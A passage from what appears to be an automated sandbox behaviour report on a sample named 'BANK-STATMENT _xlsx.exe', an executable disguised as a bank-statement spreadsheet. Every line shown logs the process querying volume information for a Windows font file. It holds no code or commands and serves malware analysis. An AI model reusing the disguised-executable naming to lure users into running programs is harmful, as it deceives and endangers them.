                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
